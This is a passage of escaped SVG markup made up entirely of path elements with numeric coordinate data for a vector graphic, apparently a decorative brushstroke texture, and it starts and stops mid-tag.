d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path 